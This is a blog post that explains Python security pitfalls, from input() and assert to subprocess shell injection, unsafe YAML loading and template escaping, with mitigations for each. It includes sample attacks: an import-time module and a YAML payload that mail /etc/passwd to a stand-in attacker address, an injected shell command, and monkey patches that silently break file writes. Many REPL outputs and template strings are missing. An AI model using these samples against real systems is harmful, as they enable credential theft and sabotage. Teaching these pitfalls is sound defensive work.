    Being easy to pick up and progress quickly towards developing larger and more complicated applications, Python is becoming increasingly ubiquitous in computing environments. Though apparent language clarity and friendliness could lull the vigilance of software engineers and system administrators -- luring them into coding mistakes that may have serious security implications. In this article, which primarily targets people who are new to Python, a handful of security-related quirks are looked at; experienced developers may well be aware of the peculiarities that follow.

    Input function

    In a large collection of Python 2 built-in functions, input is a total security disaster. Once called, whatever is read from stdin gets immediately evaluated as Python code:

       $ python2
        >>> input()
        ['__builtins__', '__doc__', '__name__', '__package__']
       >>> input()

    Clearly, the input function must never ever be used unless data on a script's stdin is fully trusted. Python 2 documentation suggests raw_input as a safe alternative. In Python 3 the input function becomes equivalent to raw_input, thus fixing this weakness once and forever.

    Assert statement

    There is a coding idiom of using assert statements for catching next to impossible conditions in a Python application.

       def verify_credentials(username, password):
           assert username and password, 'Credentials not supplied by caller'
           ... authenticate possibly null user with null password ...

    However, Python does not produce any instructions for assert statements when compiling source code into optimized byte code (e.g. python -O). That silently removes whatever protection against malformed data that the programmer wired into their code leaving the application open to attacks.

    The root cause of this weakness is that the assert mechanism is designed purely for testing purposes, as is done in C++. Programmers must use other means for ensuring data consistency.

    Reusable integers

    Everything is an object in Python. Every object has a unique identity which can be read by the id function. To figure out if two variables or attributes are pointing to the same object the is operator can be used. Integers are objects so the is operation is indeed defined for them:

        >>> 999+1 is 1000

    If the outcome of the above operation looks surprising, keep in mind that the is operator works with identities of two objects -- it does not compare their numerical, or any other, values. However:

        >>> 1+1 is 2

    The explanation for this behavior is that Python maintains a pool of objects representing the first few hundred integers and reuses them to save on memory and object creation. To make it even more confusing, the definition of what "small integer" is differs across Python versions.

    A mitigation here is to never use the is operator for value comparison. The is operator is designed to deal exclusively with object identities.

    Floats comparison

    Working with floating point numbers may get complicated due to inherently limited precision and differences stemming from decimal versus binary fraction representation. One common cause of confusion is that float comparison may sometimes yield unexpected result. Here's a famous example:

       >>> 2.2 * 3.0 == 3.3 * 2.0

    The cause of the above phenomena is indeed a rounding error:

       >>> (2.2 * 3.0).hex()
       >>> (3.3 * 2.0).hex()

    Another interesting observation is related to the Python float type which supports the notion of infinity. One could reason that everything is smaller than infinity:

       >>> 10**1000000 > float('infinity')

    However, up to Python 3, a type object beats the infinity:

       >>> float > float('infinity')

    The best mitigation is to stick to integer arithmetic whenever possible. The next best approach would be to use the decimal stdlib module which attempts to shield users from annoying details and dangerous flaws.

    Generally, when important decisions are made based on the outcome of arithmetic operations, care must be taken not to fall victim to a rounding error. See the issued and limitations chapter in Python documentation.

    Private attributes

    Python does not support object attributes hiding. But there is a workaround based on the feature of double underscored attributes mangling. Although changes to attribute names occur only to code, attributes names hardcoded into string constants remain unmodified. This may lead to confusing behavior when a double underscored attribute visibly "hides" from getattr()/hasattr() functions.

       >>> class X(object):
       ...   def __init__(self):
       ...     self.__private = 1
       ...   def get_private(self):
       ...     return self.__private
       ...   def has_private(self):
       ...     return hasattr(self, '__private')
       >>> x = X()
       >>> x.has_private()
       >>> x.get_private()

    For this privacy feature to work, attribute mangling is not performed on attributes out of class definition. That effectively "splits" any given double underscored attributive onto two depending on from where it is being referenced:

       >>> class X(object):
       ...   def __init__(self):
       ...     self.__private = 1
       >>> x = X()
       >>> x.__private
       AttributeError: 'X' object has no attribute '__private'
       >>> x.__private = 2
       >>> x.__private
       >>> hasattr(x, '__private')

    These quirks could turn into a security weakness if a programmer relies on double underscored attributes for making important decisions in their code without paying attention to the asymmetrical behavior of private attributes.

    Module injection

    Python modules importing system is powerful and complicated. Modules and packages can be imported by file or directory name found in search path as defined by sys.path list. Search path initialization is an intricate process which is also dependent on Python version, platform and local configuration. To mount successful attack on a Python application, an attacker needs to find a way to smuggle a malicious Python module into a directory or importable package file which Python would consider when trying to import a module.

    The mitigation is to maintain secure access permissions on all directories and package files in search path to ensure unprivileged users do not have write access to them. Keep in mind that the directory where the initial script invoking Python interpreter resides is automatically inserted into the search path.

    Running script like this reveals actual search path:

       $ cat myapp.py
       import sys
       import pprint

    On Windows platform, instead of script location, current working directory of the Python process is injected into the search path. On UNIX platforms, current working directory is automatically inserted into sys.path whenever program code is read from stdin or command line ("-" or "-c" or "-m" options):

       $ echo "import sys, pprint; pprint.pprint(sys.path)" | python -
       $ python -c 'import sys, pprint; pprint.pprint(sys.path)'
       $ cd /tmp
       $ python -m myapp

    To mitigate the risk of module injection from current working directory explicitly changing directory to a safe one is recommended prior to running Python on Windows or passing code through command line.

    Another possible source for the search path is the contents of the $PYTHONPATH environment variable. An easy mitigation against sys.path population from process environment is the -E option to Python interpreter which makes it ignoring $PYTHONPATH variable.

    Code execution on import

    It may not look obvious that the import statement actually leads to execution of the code in the module being imported. That is why even importing mistrustful module or package is risky. Importing simple module like this may lead to unpleasant consequences:

       $ cat malicious.py
       import os
       import sys
       os.system('cat /etc/passwd | mail attacker@blackhat.com')
       del sys.modules['malicious']  # pretend it's not imported
       $ python
       >>> import malicious
       >>> dir(malicious)
       Traceback (most recent call last):
       NameError: name 'malicious' is not defined

    Combined with sys.path entry injection attack, it may pave the way to further system exploitation.

    Monkey patching

    A process of changing Python objects attributes at run-time is known as monkey patching. Being a dynamic language, Python fully supports run-time program introspection and code mutation. Once a malicious module gets imported one way or another, any existing mutable object could be insensibly monkey patched without programmer's consent. Consider this:

       $ cat nowrite.py
       import builtins
       def malicious_open(*args, **kwargs):
          if len(args) > 1 and args[1] == 'w':
             args = ('/dev/null',) + args[1:]
          return original_open(*args, **kwargs)
       original_open, builtins.open = builtins.open, malicious_open

    If the code above gets executed by Python interpreter, everything written into files won't be stored on the filesystem:

       >>> import nowrite
       >>> open('data.txt', 'w').write('data to store')
       >>> open('data.txt', 'r')
       Traceback (most recent call last):
       FileNotFoundError: [Errno 2] No such file or directory: 'data.txt'

    Attacker could leverage Python garbage collector (gc.get_objects()) to get hold of all objects in existence and hack any of them.

    In Python 2 built-in objects can be accesses via the magic __builtins__ module. One of the known tricks, exploiting __builtins__ mutability, that might bring the world to its end is:

       >>> __builtins__.False, __builtins__.True = True, False
       >>> True
       >>> int(True)

    In Python 3 assignments to True and False won't work so they can't be manipulated that way.

    Functions are first-class objects in Python, they maintain references to many properties of a function. In particular, executable byte code is referenced by the __code__ attribute which, of course, can be modified:

       >>> import shutil
       >>> shutil.copy
       <function copy at 0x7f30c0c66560>
       >>> shutil.copy.__code__ = (lambda src, dst: dst).__code__
       >>> shutil.copy('my_file.txt', '/tmp')
       >>> shutil.copy
       <function copy at 0x7f30c0c66560>

    Once the above monkey patch is applied, despite shutil.copy function still looking sane, it silently stopped working due to the no-op lambda function code set to it.

    Type of Python object is determined by the __class__ attribute. Evil attacker could hopelessly mess up things by resorting to changing type of live objects:

       >>> class X(object): pass
       >>> class Y(object): pass
       >>> x_obj = X()
       >>> x_obj
       <__main__.X object at 0x7f62dbe5e010>
       >>> isinstance(x_obj, X)
       >>> x_obj.__class__ = Y
       >>> x_obj
       <__main__.Y object at 0x7f62dbe5d350>
       >>> isinstance(x_obj, X)
       >>> isinstance(x_obj, Y)

    The only mitigation against malicious monkey patching is to ensure the authenticity and integrity of the Python modules being imported.

    Shell injection via subprocess

    Being known as a glue language, it is quite common for a Python script to delegate system administration tasks to other programs by asking the operating system to execute them, possibly providing additional parameters. The subprocess module offers easy to use and quite high-level service for such tasks.

       >>> from subprocess import call
       >>> unvalidated_input = '/bin/true'
       >>> call(unvalidated_input)

    But there is a catch! To make use of UNIX shell services, like command line parameters expansion, the shell keyword argument to the call function should be turned into True. Then the first argument to call function is passed as-is to the system shell for further parsing and interpretation. Once unvalidated user input reaches the call function (or other functions implemented in the subprocess module), a hole is opened to the underlying system resources.

       >>> from subprocess import call
       >>> unvalidated_input = '/bin/true'
       >>> unvalidated_input += '; cut -d: -f1 /etc/passwd'
       >>> call(unvalidated_input, shell=True)

    It is obviously much safer not to invoke UNIX shell for external command execution by leaving the shell keyword in its default False state and supplying a vector of command and its parameters to the subprocess functions. In this second invocation form, neither command nor its parameters are interpreted or expanded by shell.

       >>> from subprocess import call
       >>> call(['/bin/ls', '/tmp'])

    If the nature of the application dictates the use of UNIX shell services, it is utterly important to sanitize everything that goes to subprocess making sure that no unwanted shell functionality can be exploited by malicious users. In newer Python versions, shell escaping can be done with the standard library's shlex.quote function.

    Temporary files

    While vulnerabilities based on improper use of temporary files strike many programming languages, they are still surprisingly common in Python scripts so it's probably worth mentioning here.

    Vulnerabilities of this kind leverage insecure file system access permissions, possibly involving intermediate steps, ultimately leading to data confidentiality or integrity issues. Detailed description of the problem in general can be found in CWE-377.

    Luckily, Python is shipped with the tempfile module in its standard library which offers high-level functions for creating temporary file names "in the most secure manner possible". Beware the flawed tempfile.mktemp implementation which is still present in the library for backward compatibility reasons. The tempfile.mktemp function must never be used! Instead, use tempfile.TemporaryFile, or tempfile.mkstemp if you need the temporary file to persist after it is closed.

    Another possibility of accidentally introducing a weakness is through the use of shutil.copyfile function. The problem here is that destination file is created in the most insecure manner possible.

    Security-savvy developer may consider first copying the source file into a random temporary file name, then renaming the temporary file to its final name. While this may look like a good plan, it can be rendered insecure by the shutil.move function if it is used for performing the renaming. Trouble is that if the temporary file is created on a file system other than the one where the final file is to reside, shutil.move will fail to move it atomically (via os.rename) and silently resort to the insecure shutil.copy. A mitigation would be to prefer os.rename over shutil.move as os.rename is guaranteed to fail explicitly on operations across file system boundaries.

    Further complications may arise from the inability of shutil.copy to copy all file meta data potentially leaving the created file unprotected.

    Not exclusively specific to Python, care must be taken when modifying files on file systems of non-mainstream types, especially remote ones. Data consistency guarantees tend to differ in the area of file access serialization. As an example, NFSv2 does not honour the O_EXCL flag to the open system call, which is crucial for atomic file creation.

    Insecure deserialization

    Many data serialization techniques exist, among them Pickle is designed specifically to de/serialize Python objects. Its goal is to dump live Python objects into an octet stream for storage or transmission, then reconstruct them back to possibly another instance of Python. The reconstruction step is inherently risky if serialized data is tampered with. The insecurity of Pickle is well recognized and clearly noted in Python documentation.

    Being a popular configuration file format, YAML is not necessarily perceived as a powerful serialization protocol capable of tricking a deserializer into executing arbitrary code. What makes it even more dangerous is that the de facto default YAML implementation for Python - PyYAML makes deserialization look very innocent:

       >>> import yaml
       >>> dangerous_input = """
       ... some_option: !!python/object/apply:subprocess.call
       ...   args: [cat /etc/passwd | mail attacker@blackhat.com]
       ...   kwds: {shell: true}
       ... """
       >>> yaml.load(dangerous_input)
       {'some_option': 0}

    ...while /etc/passwd is being stolen. A suggested fix is to always use yaml.safe_load for handling YAML serialization you can't trust. Still, the current PyYAML default feels somewhat provoking considering other serialization libraries tend to use dump/load function names for similar purposes, but in a safe manner.

    Templating engines

    Web application authors adopted Python long ago. Over the course of a decade, quite a number of Web frameworks have been developed. Many of them utilize templating engines for generating dynamic web contents from, well, templates and runtime variables. Aside from web applications, templating engines found their way into completely different software such as the Ansible IT automation tool.

    When content is being rendered from static templates and runtime variables, there is a risk of user-controlled code injection through runtime variables. A successfully mounted attack against a web application may lead to a cross-site scripting vulnerability. Usual mitigation for server-side template injection is to sanitize the contents of template variables before it interpolates into the final document. The sanitization can be done by denying, stripping off or escaping characters that are special to any given markup or other domain-specific language.

    Unfortunately, templating engines do not seem to lean towards tighter security here -- looking at the most popular implementations, neither of them apply escaping mechanism by default, relying on a developer's awareness of the risks.

    For example, Jinja2, which is probably one of the most popular tools, renders everything:

       >>> from jinja2 import Environment
       >>> template = Environment().from_string('')
       >>> template.render(variable='<script>do_evil()</script>')

    ...unless one of many possible escaping mechanisms is explicitly engaged by reversing its default settings:

       >>> from jinja2 import Environment
       >>> template = Environment(autoescape=True).from_string('')
       >>> template.render(variable='<script>do_evil()</script>')

    An additional complication is that, in certain use-cases, programmers do not want to sanitize all template variables, intentionally leaving some of them holding potentially dangerous content intact. Templating engines address that need by introducing "filters" to let programmers explicitly sanitize the contents of individual variables. Jinja2 also offers a possibility of toggling the escaping default on a per-template basis.

    It can get even more fragile and complicated if developers choose to escape only a subset of markup language tags letting others legitimately sneaking into the final document.


    This blog post is not meant to be a comprehensive list of all potential traps and shortcomings specific to the Python ecosystem. The goal is to raise awareness of security risks that may come into being once one starts coding in Python, hopefully making programming more enjoyable, and our lives more secure.

    Posted: 2016-09-07T13:30:00+00:00